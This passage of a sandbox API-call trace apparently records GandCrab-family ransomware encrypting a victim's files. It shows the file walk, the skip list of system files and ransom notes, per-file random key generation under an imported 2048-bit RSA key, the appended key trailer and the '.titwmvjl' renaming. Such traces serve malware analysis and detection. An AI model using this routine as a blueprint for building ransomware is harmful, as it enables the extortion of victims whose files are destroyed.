[0090.291] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\jsurb8pxuuyeqy.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\JsURb8PXUUyeqY.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\jsurb8pxuuyeqy.xls.titwmvjl"), dwFlags=0x1) returned 1 [0090.292] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.292] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.292] lstrcmpW (lpString1="Pi5DLycnMA-.pps", lpString2=".") returned 1 [0090.292] lstrcmpW (lpString1="Pi5DLycnMA-.pps", lpString2="..") returned 1 [0090.292] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="Pi5DLycnMA-.pps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps" [0090.292] lstrlenW (lpString=".titwmvjl") returned 9 [0090.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned 139 [0090.293] VirtualAlloc (lpAddress=0x0, dwSize=0x156, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.293] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps.titwmvjl") returned 148 [0090.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned 139 [0090.293] lstrlenW (lpString=".pps") returned 4 [0090.293] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.293] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pps ") returned 5 [0090.293] lstrcmpiW (lpString1=".pps", lpString2=".titwmvjl") returned -1 [0090.293] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.294] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned 139 [0090.294] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned 139 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="desktop.ini") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="autorun.inf") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="ntuser.dat") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="iconcache.db") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="bootsect.bak") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="boot.ini") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="ntuser.dat.log") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="thumbs.db") returned -1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="KRAB-DECRYPT.html") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="CRAB-DECRYPT.html") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="ntldr") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="NTDETECT.COM") returned 1 [0090.294] lstrcmpiW (lpString1="Pi5DLycnMA-.pps", lpString2="Bootfont.bin") returned 1 [0090.294] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps") returned 139 [0090.294] lstrlenW (lpString=".pps") returned 4 [0090.294] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.294] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pps ") returned 5 [0090.294] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.295] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.295] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\pi5dlycnma-.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.295] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.295] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.296] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.296] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.297] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.297] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.298] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.298] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.298] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.298] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.298] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.299] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.300] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.300] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.300] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.300] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.300] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.301] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.302] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.302] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.302] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.302] GetLastError () returned 0x0 [0090.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.303] CryptDestroyKey (hKey=0x503778) returned 1 [0090.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.303] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.303] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.304] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503938) returned 1 [0090.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.304] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.304] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.305] GetLastError () returned 0x0 [0090.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.305] CryptDestroyKey (hKey=0x503938) returned 1 [0090.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.305] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.305] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.305] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.305] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0x375a, lpOverlapped=0x0) returned 1 [0090.311] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffffc8a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.312] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x375a, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0x375a, lpOverlapped=0x0) returned 1 [0090.313] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.320] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.325] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.325] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.325] CloseHandle (hObject=0x2dc) returned 1 [0090.326] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\pi5dlycnma-.pps"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\Pi5DLycnMA-.pps.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\pi5dlycnma-.pps.titwmvjl"), dwFlags=0x1) returned 1 [0090.326] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.326] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.326] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.326] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.327] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt" [0090.327] lstrlenW (lpString=".titwmvjl") returned 9 [0090.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt") returned 144 [0090.327] VirtualAlloc (lpAddress=0x0, dwSize=0x160, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.327] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 153 [0090.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt") returned 144 [0090.327] lstrlenW (lpString=".txt") returned 4 [0090.327] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.327] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.327] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.327] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt") returned 144 [0090.327] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\TITWMVJL-DECRYPT.txt") returned 144 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.327] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.327] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.328] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.328] lstrcmpW (lpString1="wlly.pptx", lpString2=".") returned 1 [0090.328] lstrcmpW (lpString1="wlly.pptx", lpString2="..") returned 1 [0090.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="wlly.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx" [0090.328] lstrlenW (lpString=".titwmvjl") returned 9 [0090.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned 133 [0090.328] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.328] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx.titwmvjl") returned 142 [0090.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned 133 [0090.328] lstrlenW (lpString=".pptx") returned 5 [0090.328] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.328] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0090.328] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0090.328] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned 133 [0090.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned 133 [0090.328] lstrcmpiW (lpString1="wlly.pptx", lpString2="desktop.ini") returned 1 [0090.328] lstrcmpiW (lpString1="wlly.pptx", lpString2="autorun.inf") returned 1 [0090.328] lstrcmpiW (lpString1="wlly.pptx", lpString2="ntuser.dat") returned 1 [0090.328] lstrcmpiW (lpString1="wlly.pptx", lpString2="iconcache.db") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="bootsect.bak") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="boot.ini") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="ntuser.dat.log") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="thumbs.db") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="ntldr") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="NTDETECT.COM") returned 1 [0090.329] lstrcmpiW (lpString1="wlly.pptx", lpString2="Bootfont.bin") returned 1 [0090.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx") returned 133 [0090.329] lstrlenW (lpString=".pptx") returned 5 [0090.329] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.329] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0090.329] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.329] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.329] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\wlly.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.330] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.331] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.331] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.331] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.332] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.333] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.333] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.333] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.333] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.333] VirtualFree (lpAddress=0x2420000, 